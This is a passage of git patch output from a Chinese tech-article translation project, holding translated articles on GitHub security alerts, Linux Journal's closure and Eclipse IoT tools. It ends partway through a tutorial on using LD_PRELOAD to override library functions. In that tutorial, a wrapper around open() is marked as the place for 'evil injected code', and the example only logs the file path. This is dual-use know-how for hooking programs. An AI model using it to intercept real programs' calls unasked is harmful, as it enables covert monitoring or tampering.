Fix](https://user-images.githubusercontent.com/594029/32851987-76c36e4a-c9eb-11e7-98fc-feb39fddaadb.gif)][1] + +### 如何开始使用安全警报 + +无论你的项目时私有还是公有的,安全警报都会为团队中的正确人员提供重要的漏洞信息。 + +启用你的依赖图 + +公开仓库将自动启用依赖关系图和安全警报。对于私人仓库,你需要在仓库设置中添加安全警报,或者在 “Insights” 选项卡中允许访问仓库的 “依赖关系图” 部分。 + +设置通知选项 + +启用依赖关系图后,管理员将默认收到安全警报。管理员还可以在依赖关系图设置中将团队或个人添加为安全警报的收件人。 + +警报响应 + +当我们通知你潜在的漏洞时,我们将突出显示我们建议更新的任何依赖关系。如果存在已知的安全版本,我们将使用机器学习和公开数据中选择一个,并将其包含在我们的建议中。 + +### 漏洞覆盖率 + +有 [CVE ID][2](公开披露的[国家漏洞数据库][3]中的漏洞)的漏洞将包含在安全警报中。但是,并非所有漏洞都有 CVE ID,甚至许多公开披露的漏洞也没有。随着安全数据的增长,我们将继续更好地识别漏洞。如需更多帮助来管理安全问题,请查看我们的[ GitHub Marketplace 中的安全合作伙伴][4]。 + +这是使用世界上最大的开源数据集的下一步,可以帮助你保持代码安全并做到最好。依赖关系图和安全警报目前支持 JavaScript 和 Ruby,并将在 2018 年提供 Python 支持。 + +[了解更多关于安全警报][5] + +-------------------------------------------------------------------------------- + +via: https://github.com/blog/2470-introducing-security-alerts-on-github + +作者:[mijuhan ][a] +译者:[geekpi](https://github.com/geekpi) +校对:[校对者ID](https://github.com/校对者ID) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:https://github.com/mijuhan +[1]:https://user-images.githubusercontent.com/594029/32851987-76c36e4a-c9eb-11e7-98fc-feb39fddaadb.gif +[2]:https://cve.mitre.org/ +[3]:https://nvd.nist.gov/ +[4]:https://github.com/marketplace/category/security +[5]:https://help.github.com/articles/about-security-alerts-for-vulnerable-dependencies/ From d1357f6cbfed0ed0fb7744397f48bf90035381f9 Mon Sep 17 00:00:00 2001 From: wangy325 Date: Mon, 4 Dec 2017 10:42:33 +0800 Subject: [PATCH 0223/1627] wangy325 translating.. --- .../tech/20171129 10 open source technology trends for 2018.md | 3 +++ 1 file changed, 3 insertions(+) diff --git a/sources/tech/20171129 10 open source technology trends for 2018.md b/sources/tech/20171129 10 open source technology trends for 2018.md index 1e7b137726..eb21c62ec9 100644 --- a/sources/tech/20171129 10 open source technology trends for 2018.md +++ b/sources/tech/20171129 10 open source technology trends for 2018.md @@ -1,3 +1,6 @@ +translating by wangy325... + + 10 open source technology trends for 2018 ============================================================ From f23e6c6877ba738483a16aeee1ae0150714dc29f Mon Sep 17 00:00:00 2001 From: geekpi Date: Mon, 4 Dec 2017 11:28:07 +0800 Subject: [PATCH 0224/1627] translated --- ...171201 Linux Journal Ceases Publication.md | 36 ------------------- ...171201 Linux Journal Ceases Publication.md | 34 ++++++++++++++++++ 2 files changed, 34 insertions(+), 36 deletions(-) delete mode 100644 sources/tech/20171201 Linux Journal Ceases Publication.md create mode 100644 translated/tech/20171201 Linux Journal Ceases Publication.md diff --git a/sources/tech/20171201 Linux Journal Ceases Publication.md b/sources/tech/20171201 Linux Journal Ceases Publication.md deleted file mode 100644 index 8963b183fe..0000000000 --- a/sources/tech/20171201 Linux Journal Ceases Publication.md +++ /dev/null @@ -1,36 +0,0 @@ -translating---geekpi - -Linux Journal Ceases Publication -============================================================ - -EOF - -It looks like we’re at the end, folks. If all goes according to a plan we’d rather not have, the November issue of Linux Journal was our last. - -The simple fact is that we’ve run out of money, and options along with it. We never had a wealthy corporate parent or deep pockets of our own, and that made us an anomaly among publishers, from start to finish. While we got to be good at flying close to the ground for a long time, we lost what little elevation we had in November, when the scale finally tipped irrevocably to the negative. - -While we see a future like publishing’s past—a time when advertisers sponsor a publication because they value its brand and readers—the advertising world we have today would rather chase eyeballs, preferably by planting tracking beacons in readers' browsers and zapping them with ads anywhere those readers show up. But that future isn’t here, and the past is long gone. - -There is some hope, we suppose, that a savior might come through; but it will have to be one willing to pick up some of our debt, in addition to our brand, our archive, our domains and our subscribers and readers. If you know anyone who can make a serious offer, let us know. Otherwise, watch LinuxJournal.com and hope that at least our legacy archives (which go back to Linux Journal’s birth in April 1994, when Linux hit 1.0) won’t go away. There’s a lot of great stuff here, and a lot of history we’d hate the world to lose. - -Our biggest regret is that we don’t even have enough money to return to the people who have valued us most: our subscribers. For that we could not apologize more deeply or sincerely. What we do have for subscribers: - -Linux Pro Magazine has offered our subscribers six free issues of their magazine, a publication we at Linux Journal have always admired. In our time of need, they were the first ones there for us, and we are thankful for their gracious offer. We also just finished up our 2017 archive today, which includes every issue we’ve ever published, including the first and last ones. Normally we sell that for $25, but obviously subscribers will get it for no cost. Subscribers, watch for an e-mail with details about both. - -We also hope there is some solace in knowing that we worked very, very hard at keeping Linux Journal going, and we’ve been doing that for a long time, running the leanest, smallest possible operation we could. We are a collection mostly of volunteers, and some of our employees haven’t been paid in months. We still owe money to freelancers as well. There is a limit to how long a publisher can maintain those neglects, and that limit has now been reached. - -It has been a great run, folks. A big hats-off to everyone who contributed to our birth, our success and our persistence over these many years. We’d run the credits now, but the list would be too long, and the risk of leaving worthy people out would be too high. You know who you are. Our thanks again. - --------------------------------------------------------------------------------- - -via: https://www.linuxjournal.com/content/linux-journal-ceases-publication - -作者:[ Carlie Fairchild][a] -译者:[译者ID](https://github.com/译者ID) -校对:[校对者ID](https://github.com/校对者ID) - -本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 - -[a]:https://www.linuxjournal.com/users/carlie-fairchild -[1]:https://www.linuxjournal.com/taxonomy/term/29 -[2]:https://www.linuxjournal.com/users/carlie-fairchild diff --git a/translated/tech/20171201 Linux Journal Ceases Publication.md b/translated/tech/20171201 Linux Journal Ceases Publication.md new file mode 100644 index 0000000000..2eb5c82f51 --- /dev/null +++ b/translated/tech/20171201 Linux Journal Ceases Publication.md @@ -0,0 +1,34 @@ +Linux Journal 停止发行 +============================================================ + +EOF + +伙计们,看起来我们要到终点了。如果按照计划而且没有什么其他的话,十一月份的 Linux Journal 将是我们的最后一期。 + +简单的事实是,我们已经用完了钱和期权。我们从来没有一个富有的母公司或者自己深厚的资金,从开始到结束,这使得我们变成一个反常的出版商。虽然我们在很长的一段时间内运营着,但当天平不可恢复地最终向相反方向倾斜时,我们在十一月份失去了最后一点支持。 + +虽然我们像看到出版业的过去那样看到出版业的未来 - 广告商赞助出版物的时代,因为他们重视品牌和读者 - 我们如今的广告宁愿追逐眼球,最好是在读者的浏览器中植入跟踪标记,并随时随地展示那些广告。但是,未来不是这样,过去的已经过去了。 + +我们猜想,有一个希望,那就是救世主可能会会来。但除了我们的品牌、我们的档案,我们的域名、我们的用户和读者之外,还必须是愿意承担我们一部分债务的人。如果你认识任何人能够提供认真的报价,请告诉我们。不然,请观看 LinuxJournal.com,并希望至少我们的遗留归档(可以追溯到 Linux Journal 诞生的 1994 年 4 月,当 Linux 命中 1.0 发布时)将不会消失。这里有很多很棒的东西,还有很多我们会痛恨世界失去的历史。 + +我们最大的遗憾是,我们甚至没有足够的钱回馈最看重我们的人:我们的用户。为此,我们不能更深刻或真诚地道歉。我们对订阅者而言有什么: + +Linux Pro Magazine 为我们的用户提供了六本免费的杂志,我们在 Linux Journal 上一直赞叹这点。在我们需要的时候,他们是我们的第一批人,我们感谢他们的恩惠。我们今天刚刚完成了我们的 2017 年归档,其中包括我们曾经发表过的每一个问题,包括第一个和最后一个。通常我们以 25 美元的价格出售,但显然用户将免费获得。订阅者请注意有关两者的详细信息的电子邮件。 + +我们也希望在知道我们非常非常努力地让 Linux Journal 进行下去后能有一些安慰 ,而且我们已经用最精益、小的可能运营了很长一段时间。我们是一个大多数是自愿者的组织,有些员工已经几个月没有收到工资。我们还欠钱给自由职业者。这时一个限制发行商能够维持多长时间的限制,现在这个限制已经到头了。 + +伙计们,这是一个伟大的运营。乡亲。对每一个为我们的诞生、我们的成功和我们多年的坚持作出贡献的人致敬。我们列了一份名单,但是列表太长了,并且漏掉有价值的人的风险很高。你知道你是谁。我们再次感谢。 + +-------------------------------------------------------------------------------- + +via: https://www.linuxjournal.com/content/linux-journal-ceases-publication + +作者:[ Carlie Fairchild][a] +译者:[geekpi](https://github.com/geekpi) +校对:[校对者ID](https://github.com/校对者ID) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:https://www.linuxjournal.com/users/carlie-fairchild +[1]:https://www.linuxjournal.com/taxonomy/term/29 +[2]:https://www.linuxjournal.com/users/carlie-fairchild From fbeff9160ff5a63622878905fd5c1fe0bcb556f5 Mon Sep 17 00:00:00 2001 From: geekpi Date: Mon, 4 Dec 2017 11:50:36 +0800 Subject: [PATCH 0225/1627] rename --- .../tech/20171010 Operating a Kubernetes network.md | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename "sources/tech/20171010 \tOperating a Kubernetes network.md" => sources/tech/20171010 Operating a Kubernetes network.md (100%) diff --git "a/sources/tech/20171010 \tOperating a Kubernetes network.md" b/sources/tech/20171010 Operating a Kubernetes network.md similarity index 100% rename from "sources/tech/20171010 \tOperating a Kubernetes network.md" rename to sources/tech/20171010 Operating a Kubernetes network.md From 48ad01745e8d9b7ca0ef74666e42a67a94541fbb Mon Sep 17 00:00:00 2001 From: geekpi Date: Mon, 4 Dec 2017 11:53:36 +0800 Subject: [PATCH 0226/1627] translating --- .../20171113 Glitch write fun small web projects instantly.md | 2 ++ 1 file changed, 2 insertions(+) diff --git a/sources/tech/20171113 Glitch write fun small web projects instantly.md b/sources/tech/20171113 Glitch write fun small web projects instantly.md index bfed5b9a0b..734853ce51 100644 --- a/sources/tech/20171113 Glitch write fun small web projects instantly.md +++ b/sources/tech/20171113 Glitch write fun small web projects instantly.md @@ -1,3 +1,5 @@ +translating---geekpi + Glitch: write fun small web projects instantly ============================================================ From d761333ed5c84f319c18d64950d2d5c807e24210 Mon Sep 17 00:00:00 2001 From: smartgrids Date: Mon, 4 Dec 2017 12:15:56 +0800 Subject: [PATCH 0227/1627] tranlated by smartgrids Signed-off-by: smartgrids --- ...ow Eclipse is advancing IoT development.md | 83 ------------------- ...ow Eclipse is advancing IoT development.md | 77 +++++++++++++++++ 2 files changed, 77 insertions(+), 83 deletions(-) delete mode 100644 sources/tech/20171020 How Eclipse is advancing IoT development.md create mode 100644 translated/tech/20171020 How Eclipse is advancing IoT development.md diff --git a/sources/tech/20171020 How Eclipse is advancing IoT development.md b/sources/tech/20171020 How Eclipse is advancing IoT development.md deleted file mode 100644 index 30fd8eb64d..0000000000 --- a/sources/tech/20171020 How Eclipse is advancing IoT development.md +++ /dev/null @@ -1,83 +0,0 @@ -apply for translating - -How Eclipse is advancing IoT development -============================================================ - -### Open source organization's modular approach to development is a good match for the Internet of Things. - -![How Eclipse is advancing IoT development](https://opensource.com/sites/default/files/styles/image-full-size/public/lead-images/OSDC_BUS_ArchitectureOfParticipation_520x292.png?itok=FA0Uuwzv "How Eclipse is advancing IoT development") -Image by : opensource.com - -[Eclipse][3] may not be the first open source organization that pops to mind when thinking about Internet of Things (IoT) projects. After all, the foundation has been around since 2001, long before IoT was a household word, supporting a community for commercially viable open source software development. - -September's Eclipse IoT Day, held in conjunction with RedMonk's [ThingMonk 2017][4] event, emphasized the big role Eclipse is taking in [IoT development][5]. It currently hosts 28 projects that touch a wide range of IoT needs and projects. While at the conference, I talked with [Ian Skerritt][6], who heads marketing for Eclipse, about Eclipse's IoT projects and how Eclipse thinks about IoT more broadly. - -### What's new about IoT? - -I asked Ian how IoT is different from traditional industrial automation, given that sensors and tools have been connected in factories for the past several decades. Ian notes that many factories still are not connected. - -Additionally, he says, "SCADA [supervisory control and data analysis] systems and even the factory floor technology are very proprietary, very siloed. It's hard to change it. It's hard to adapt to it… Right now, when you set up a manufacturing run, you need to manufacture hundreds of thousands of that piece, of that unit. What [manufacturers] want to do is to meet customer demand, to have manufacturing processes that are very flexible, that you can actually do a lot size of one." That's a big piece of what IoT is bringing to manufacturing. - -### Eclipse's approach to IoT - -He describes Eclipse's involvement in IoT by saying: "There's core fundamental technology that every IoT solution needs," and by using open source, "everyone can use it so they can get broader adoption." He says Eclipse see IoT as consisting of three connected software stacks. At a high level, these stacks mirror the (by now familiar) view that IoT can usually be described as spanning three layers. A given implementation may have even more layers, but they still generally map to the functions of this three-layer model: - -* A stack of software for constrained devices (e.g., the device, endpoint, microcontroller unit (MCU), sensor hardware). - -* Some type of gateway that aggregates information and data from the different sensors and sends it to the network. This layer also may take real-time actions based on what the sensors are observing. - -* A software stack for the IoT platform on the backend. This backend cloud stores the data and can provide services based on collected data, such as analysis of historical trends and predictive analytics. - -The three stacks are described in greater detail in Eclipse's whitepaper "[The Three Software Stacks Required for IoT Architectures][7]." - -Ian says that, when developing a solution within those architectures, "there's very specific things that need to be built, but there's a lot of underlying technology that can be used, like messaging protocols, like gateway services. It needs to be a modular approach to scale up to the different use cases that are up there." This encapsulates Eclipse's activities around IoT: Developing modular open source components that can be used to build a range of business-specific services and solutions. - -### Eclipse's IoT projects - -Of Eclipse's many IoT projects currently in use, Ian says two of the most prominent relate to [MQTT][8], a machine-to-machine (M2M) messaging protocol for IoT. Ian describes it as "a publish‑subscribe messaging protocol that was designed specifically for oil and gas pipeline monitoring where power-management network latency is really important. MQTT has been a great success in terms of being a standard that's being widely adopted in IoT." [Eclipse Mosquitto][9] is MQTT's broker and [Eclipse Paho][10] its client. - -[Eclipse Kura][11] is an IoT gateway that, in Ian's words, "provides northbound and southbound connectivity [for] a lot of different protocols" including Bluetooth, Modbus, controller-area network (CAN) bus, and OPC Unified Architecture, with more being added all the time. One benefit, he says, is "instead of you writing your own connectivity, Kura provides that and then connects you to the network via satellite, via Ethernet, or anything." In addition, it handles firewall configuration, network latency, and other functions. "If the network goes down, it will store messages until it comes back up," Ian says. - -A newer project, [Eclipse Kapua][12], is taking a microservices approach to providing different services for an IoT cloud platform. For example, it handles aspects of connectivity, integration, management, storage, and analysis. Ian describes it as "up and coming. It's not being deployed yet, but Eurotech and Red Hat are very active in that." - -Ian says [Eclipse hawkBit][13], which manages software updates, is one of the "most intriguing projects. From a security perspective, if you can't update your device, you've got a huge security hole." Most IoT security disasters are related to non-updated devices, he says. "HawkBit basically manages the backend of how you do scalable updates across your IoT system." - -Indeed, the difficulty of updating software in IoT devices is regularly cited as one of its biggest security challenges. IoT devices aren't always connected and may be numerous, plus update processes for constrained devices can be hard to consistently get right. For this reason, projects relating to updating IoT software are likely to be important going forward. - -### Why IoT is a good fit for Eclipse - -One of the trends we've seen in IoT development has been around building blocks that are integrated and applied to solve particular business problems, rather than monolithic IoT platforms that apply across industries and companies. This is a good fit with Eclipse's approach to IoT, which focuses on a number of modular stacks; projects that provide specific and commonly needed functions; and brokers, gateways, and protocols that can tie together the components needed for a given implementation. - --------------------------------------------------------------------------------- - -作者简介: - -Gordon Haff - Gordon Haff is Red Hat’s cloud evangelist, is a frequent and highly acclaimed speaker at customer and industry events, and helps develop strategy across Red Hat’s full portfolio of cloud solutions. He is the author of Computing Next: How the Cloud Opens the Future in addition to numerous other publications. Prior to Red Hat, Gordon wrote hundreds of research notes, was frequently quoted in publications like The New York Times on a wide range of IT topics, and advised clients on product and... - --------------------------------------------------------------------------------- - -via: https://opensource.com/article/17/10/eclipse-and-iot - -作者:[Gordon Haff ][a] -译者:[译者ID](https://github.com/译者ID) -校对:[校对者ID](https://github.com/校对者ID) - -本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 - -[a]:https://opensource.com/users/ghaff -[1]:https://opensource.com/article/17/10/eclipse-and-iot?rate=u1Wr-MCMFCF4C45IMoSPUacCatoqzhdKz7NePxHOvwg -[2]:https://opensource.com/user/21220/feed -[3]:https://www.eclipse.org/home/ -[4]:http://thingmonk.com/ -[5]:https://iot.eclipse.org/ -[6]:https://twitter.com/ianskerrett -[7]:https://iot.eclipse.org/resources/white-papers/Eclipse%20IoT%20White%20Paper%20-%20The%20Three%20Software%20Stacks%20Required%20for%20IoT%20Architectures.pdf -[8]:http://mqtt.org/ -[9]:https://projects.eclipse.org/projects/technology.mosquitto -[10]:https://projects.eclipse.org/projects/technology.paho -[11]:https://www.eclipse.org/kura/ -[12]:https://www.eclipse.org/kapua/ -[13]:https://eclipse.org/hawkbit/ -[14]:https://opensource.com/users/ghaff -[15]:https://opensource.com/users/ghaff -[16]:https://opensource.com/article/17/10/eclipse-and-iot#comments diff --git a/translated/tech/20171020 How Eclipse is advancing IoT development.md b/translated/tech/20171020 How Eclipse is advancing IoT development.md new file mode 100644 index 0000000000..0de4f38ea1 --- /dev/null +++ b/translated/tech/20171020 How Eclipse is advancing IoT development.md @@ -0,0 +1,77 @@ +translated by smartgrids +Eclipse 如何助力 IoT 发展 +============================================================ + +### 开源组织的模块发开发方式非常适合物联网。 + +![How Eclipse is advancing IoT development](https://opensource.com/sites/default/files/styles/image-full-size/public/lead-images/OSDC_BUS_ArchitectureOfParticipation_520x292.png?itok=FA0Uuwzv "How Eclipse is advancing IoT development") +图片来源: opensource.com + +[Eclipse][3] 可能不是第一个去研究物联网的开源组织。但是,远在 IoT 家喻户晓之前,该基金会在 2001 年左右就开始支持开源软件发展商业化。九月 Eclipse 物联网日和 RedMonk 的 [ThingMonk 2017][4] 一块举行,着重强调了 Eclipse 在 [物联网发展][5] 中的重要作用。它现在已经包含了 28 个项目,覆盖了大部分物联网项目需求。会议过程中,我和负责 Eclipse 市场化运作的 [Ian Skerritt][6] 讨论了 Eclipse 的物联网项目以及如何拓展它。 + +###物联网的最新进展? +我问 Ian 物联网同传统工业自动化,也就是前几十年通过传感器和相应工具来实现工厂互联的方式有什么不同。 Ian 指出很多工厂是还没有互联的。 +另外,他说“ SCADA[监控和数据分析] 系统以及工厂底层技术都是私有、独立性的。我们很难去改变它,也很难去适配它们…… 现在,如果你想运行一套生产系统,你需要设计成百上千的单元。生产线想要的是满足用户需求,使制造过程更灵活,从而可以不断产出。” 这也就是物联网会带给制造业的一个很大的帮助。 + + +###Eclipse 物联网方面的研究 +Ian 对于 Eclipse 在物联网的研究是这样描述的:“满足任何物联网解决方案的核心基础技术” ,通过使用开源技术,“每个人都可以使用从而可以获得更好的适配性。” 他说,Eclipse 将物联网视为包括三层互联的软件栈。从更高的层面上看,这些软件栈(按照大家常见的说法)将物联网描述为跨越三个层面的网络。特定的观念可能认为含有更多的层面,但是他们一直符合这个三层模型的功能的: + +* 一种可以装载设备(例如设备、终端、微控制器、传感器)用软件的堆栈。 +* 将不同的传感器采集到的数据信息聚合起来并传输到网上的一类网关。这一层也可能会针对传感器数据检测做出实时反映。 +* 物联网平台后端的一个软件栈。这个后端云存储数据并能根据采集的数据比如历史趋势、预测分析提供服务。 + +这三个软件栈在 Eclipse 的白皮书 “ [The Three Software Stacks Required for IoT Architectures][7] ”中有更详细的描述。 + +Ian 说在这些架构中开发一种解决方案时,“需要开发一些特殊的东西,但是很多底层的技术是可以借用的,像通信协议、网关服务。需要一种模块化的方式来满足不用的需求场合。” Eclipse 关于物联网方面的研究可以概括为:开发模块化开源组件从而可以被用于开发大量的特定性商业服务和解决方案。 + +###Eclipse 的物联网项目 + +在众多一杯应用的 Eclipse 物联网应用中, Ian 举了两个和 [MQTT][8] 有关联的突出应用,一个设备与设备互联(M2M)的物联网协议。 Ian 把它描述成“一个专为重视电源管理工作的油气传输线监控系统的信息发布/订阅协议。MQTT 已经是众多物联网广泛应用标准中很成功的一个。” [Eclipse Mosquitto][9] 是 MQTT 的代理,[Eclipse Paho][10] 是他的客户端。 +[Eclipse Kura][11] 是一个物联网网关,引用 Ian 的话,“它连接了很多不同的协议间的联系”包括蓝牙、Modbus、CANbus 和 OPC 统一架构协议,以及一直在不断添加的协议。一个优势就是,他说,取代了你自己写你自己的协议, Kura 提供了这个功能并将你通过卫星、网络或其他设备连接到网络。”另外它也提供了防火墙配置、网络延时以及其它功能。Ian 也指出“如果网络不通时,它会存储信息直到网络恢复。” + +最新的一个项目中,[Eclipse Kapua][12] 正尝试通过微服务来为物联网云平台提供不同的服务。比如,它集成了通信、汇聚、管理、存储和分析功能。Ian 说“它正在不断前进,虽然还没被完全开发出来,但是 Eurotech 和 RedHat 在这个项目上非常积极。” +Ian 说 [Eclipse hawkBit][13] ,软件更新管理的软件,是一项“非常有趣的项目。从安全的角度说,如果你不能更新你的设备,你将会面临巨大的安全漏洞。”很多物联网安全事故都和无法更新的设备有关,他说,“ HawkBit 可以基本负责通过物联网系统来完成扩展性更新的后端管理。” + +物联网设备软件升级的难度一直被看作是难度最高的安全挑战之一。物联网设备不是一直连接的,而且数目众多,再加上首先设备的更新程序很难完全正常。正因为这个原因,关于无赖女王软件升级的项目一直是被当作重要内容往前推进。 + +###为什么物联网这么适合 Eclipse + +在物联网发展趋势中的一个方面就是关于构建模块来解决商业问题,而不是宽约工业和公司的大物联网平台。 Eclipse 关于物联网的研究放在一系列模块栈、提供特定和大众化需求功能的项目,还有就是指定目标所需的可捆绑式中间件、网关和协议组件上。 + + +-------------------------------------------------------------------------------- + + + +作者简介: + +Gordon Haff - Gordon Haff 是红帽公司的云营销员,经常在消费者和工业会议上讲话,并且帮助发展红帽全办公云解决方案。他是 计算机前言:云如何如何打开众多出版社未来之门 的作者。在红帽之前, Gordon 写了成百上千的研究报告,经常被引用到公众刊物上,像纽约时报关于 IT 的议题和产品建议等…… + +-------------------------------------------------------------------------------- + +转自: https://opensource.com/article/17/10/eclipse-and-iot + +作者:[Gordon Haff ][a] +译者:[smartgrids](https://github.com/smartgrids) +校对:[校对者ID](https://github.com/校对者ID) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:https://opensource.com/users/ghaff +[1]:https://opensource.com/article/17/10/eclipse-and-iot?rate=u1Wr-MCMFCF4C45IMoSPUacCatoqzhdKz7NePxHOvwg +[2]:https://opensource.com/user/21220/feed +[3]:https://www.eclipse.org/home/ +[4]:http://thingmonk.com/ +[5]:https://iot.eclipse.org/ +[6]:https://twitter.com/ianskerrett +[7]:https://iot.eclipse.org/resources/white-papers/Eclipse%20IoT%20White%20Paper%20-%20The%20Three%20Software%20Stacks%20Required%20for%20IoT%20Architectures.pdf +[8]:http://mqtt.org/ +[9]:https://projects.eclipse.org/projects/technology.mosquitto +[10]:https://projects.eclipse.org/projects/technology.paho +[11]:https://www.eclipse.org/kura/ +[12]:https://www.eclipse.org/kapua/ +[13]:https://eclipse.org/hawkbit/ +[14]:https://opensource.com/users/ghaff +[15]:https://opensource.com/users/ghaff +[16]:https://opensource.com/article/17/10/eclipse-and-iot#comments From 53000863489af8605b3c1362b319dd508303853c Mon Sep 17 00:00:00 2001 From: Sihua Zheng Date: Mon, 4 Dec 2017 13:31:35 +0800 Subject: [PATCH 0228/1627] translating --- sources/tech/20171107 GitHub welcomes all CI tools.md | 2 ++ 1 file changed, 2 insertions(+) diff --git a/sources/tech/20171107 GitHub welcomes all CI tools.md b/sources/tech/20171107 GitHub welcomes all CI tools.md index f3112d9481..7bef351bd6 100644 --- a/sources/tech/20171107 GitHub welcomes all CI tools.md +++ b/sources/tech/20171107 GitHub welcomes all CI tools.md @@ -1,3 +1,5 @@ +translating---geekpi + GitHub welcomes all CI tools ==================== From db679cf7f234585074f7b0502d44029c43293aec Mon Sep 17 00:00:00 2001 From: Ezio Date: Mon, 4 Dec 2017 14:25:46 +0800 Subject: [PATCH 0229/1627] =?UTF-8?q?20171204-3=20=E9=80=89=E9=A2=98?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- ...nject features and investigate programs.md | 211 ++++++++++++++++++ 1 file changed, 211 insertions(+) create mode 100644 sources/tech/20130402 Dynamic linker tricks Using LD_PRELOAD to cheat inject features and investigate programs.md diff --git a/sources/tech/20130402 Dynamic linker tricks Using LD_PRELOAD to cheat inject features and investigate programs.md b/sources/tech/20130402 Dynamic linker tricks Using LD_PRELOAD to cheat inject features and investigate programs.md new file mode 100644 index 0000000000..2329fadd41 --- /dev/null +++ b/sources/tech/20130402 Dynamic linker tricks Using LD_PRELOAD to cheat inject features and investigate programs.md @@ -0,0 +1,211 @@ +# Dynamic linker tricks: Using LD_PRELOAD to cheat, inject features and investigate programs + +**This post assumes some basic C skills.** + +Linux puts you in full control. This is not always seen from everyone’s perspective, but a power user loves to be in control. I’m going to show you a basic trick that lets you heavily influence the behavior of most applications, which is not only fun, but also, at times, useful. + +#### A motivational example + +Let us begin with a simple example. Fun first, science later. + + +random_num.c: +``` +#include +#include +#include + +int main(){ + srand(time(NULL)); + int i = 10; + while(i--) printf("%d\n",rand()%100); + return 0; +} +``` + +Simple enough, I believe. I compiled it with no special flags, just + +> ``` +> gcc random_num.c -o random_num +> ``` + +I hope the resulting output is obvious – ten randomly selected numbers 0-99, hopefully different each time you run this program. + +Now let’s pretend we don’t really have the source of this executable. Either delete the source file, or move it somewhere – we won’t need it. We will significantly modify this programs behavior, yet without touching it’s source code nor recompiling it. + +For this, lets create another simple C file: + + +unrandom.c: +``` +int rand(){ + return 42; //the most random number in the universe +} +``` + +We’ll compile it into a shared library. + +> ``` +> gcc -shared -fPIC unrandom.c -o unrandom.so +> ``` + +So what we have now is an application that outputs some random data, and a custom library, which implements the rand() function as a constant value of 42\.  Now… just run  _random_num _ this way, and watch the result: + +> ``` +> LD_PRELOAD=$PWD/unrandom.so ./random_nums +> ``` + +If you are lazy and did not do it yourself (and somehow fail to guess what might have happened), I’ll let you know – the output consists of ten 42’s. + +This may be even more impressive it you first: + +> ``` +> export LD_PRELOAD=$PWD/unrandom.so +> ``` + +and then run the program normally. An unchanged app run in an apparently usual manner seems to be affected by what we did in our tiny library… + +###### **Wait, what? What did just happen?** + +Yup, you are right, our program failed to generate random numbers, because it did not use the “real” rand(), but the one we provided – which returns 42 every time. + +###### **But we *told* it to use the real one. We programmed it to use the real one. Besides, at the time we created that program, the fake rand() did not even exist!** + +This is not entirely true. We did not choose which rand() we want our program to use. We told it just to use rand(). + +When our program is started, certain libraries (that provide functionality needed by the program) are loaded. We can learn which are these using  _ldd_ : + +> ``` +> $ ldd random_nums +> linux-vdso.so.1 => (0x00007fff4bdfe000) +> libc.so.6 => /lib/x86_64-linux-gnu/libc.so.6 (0x00007f48c03ec000) +> /lib64/ld-linux-x86-64.so.2 (0x00007f48c07e3000) +> ``` + +What you see as the output is the list of libs that are needed by  _random_nums_ . This list is built into the executable, and is determined compile time. The exact output might slightly differ on your machine, but a **libc.so** must be there – this is the file which provides core C functionality. That includes the “real” rand(). + +We can have a peek at what functions does libc provide. I used the following to get a full list: + +> ``` +> nm -D /lib/libc.so.6 +> ``` + +The  _nm_  command lists symbols found in a binary file. The -D flag tells it to look for dynamic symbols, which makes sense, as libc.so.6 is a dynamic library. The output is very long, but it indeed lists rand() among many other standard functions. + +Now what happens when we set up the environmental variable LD_PRELOAD? This variable **forces some libraries to be loaded for a program**. In our case, it loads  _unrandom.so_  for  _random_num_ , even though the program itself does not ask for it. The following command may be interesting: + +> ``` +> $ LD_PRELOAD=$PWD/unrandom.so ldd random_nums +> linux-vdso.so.1 => (0x00007fff369dc000) +> /some/path/to/unrandom.so (0x00007f262b439000) +> libc.so.6 => /lib/x86_64-linux-gnu/libc.so.6 (0x00007f262b044000) +> /lib64/ld-linux-x86-64.so.2 (0x00007f262b63d000) +> ``` + +Note that it lists our custom library. And indeed this is the reason why it’s code get’s executed:  _random_num_  calls rand(), but if  _unrandom.so_  is loaded it is our library that provides implementation for rand(). Neat, isn’t it? + +#### Being transparent + +This is not enough. I’d like to be able to inject some code into an application in a similar manner, but in such way that it will be able to function normally. It’s clear if we implemented open() with a simple “ _return 0;_ “, the application we would like to hack should malfunction. The point is to be **transparent**, and to actually call the original open: + +inspect_open.c: +``` +int open(const char *pathname, int flags){ + /* Some evil injected code goes here. */ + return open(pathname,flags); // Here we call the "real" open function, that is provided to us by libc.so +} +``` + +Hm. Not really. This won’t call the “original” open(…). Obviously, this is an endless recursive call. + +How do we access the “real” open function? It is needed to use the programming interface to the dynamic linker. It’s simpler than it sounds. Have a look at this complete example, and then I’ll explain what happens there: + +inspect_open.c: + +``` +#define _GNU_SOURCE +#include + +typedef int (*orig_open_f_type)(const char *pathname, int flags); + +int open(const char *pathname, int flags, ...) +{ + /* Some evil injected code goes here. */ + + orig_open_f_type orig_open; + orig_open = (orig_open_f_type)dlsym(RTLD_NEXT,"open"); + return orig_open(pathname,flags); +} +``` + +The  _dlfcn.h_  is needed for  _dlsym_  function we use later. That strange  _#define_  directive instructs the compiler to enable some non-standard stuff, we need it to enable  _RTLD_NEXT_  in  _dlfcn.h_ . That typedef is just creating an alias to a complicated pointer-to-function type, with arguments just as the original open – the alias name is  _orig_open_f_type_ , which we’ll use later. + +The body of our custom open(…) consists of some custom code. The last part of it creates a new function pointer  _orig_open_  which will point to the original open(…) function. In order to get the address of that function, we ask  _dlsym_  to find for us the next “open” function on dynamic libraries stack. Finally, we call that function (passing the same arguments as were passed to our fake “open”), and return it’s return value as ours. + +As the “evil injected code” I simply used: + +inspect_open.c (fragment): + +``` +printf("The victim used open(...) to access '%s'!!!\n",pathname); //remember to include stdio.h! +``` + +To compile it, I needed to slightly adjust compiler flags: + +> ``` +> gcc -shared -fPIC  inspect_open.c -o inspect_open.so -ldl +> ``` + +I had to append  _-ldl_ , so that this shared library is linked to  _libdl_ , which provides the  _dlsym_  function. (Nah, I am not going to create a fake version of  _dlsym_ , though this might be fun.) + +So what do 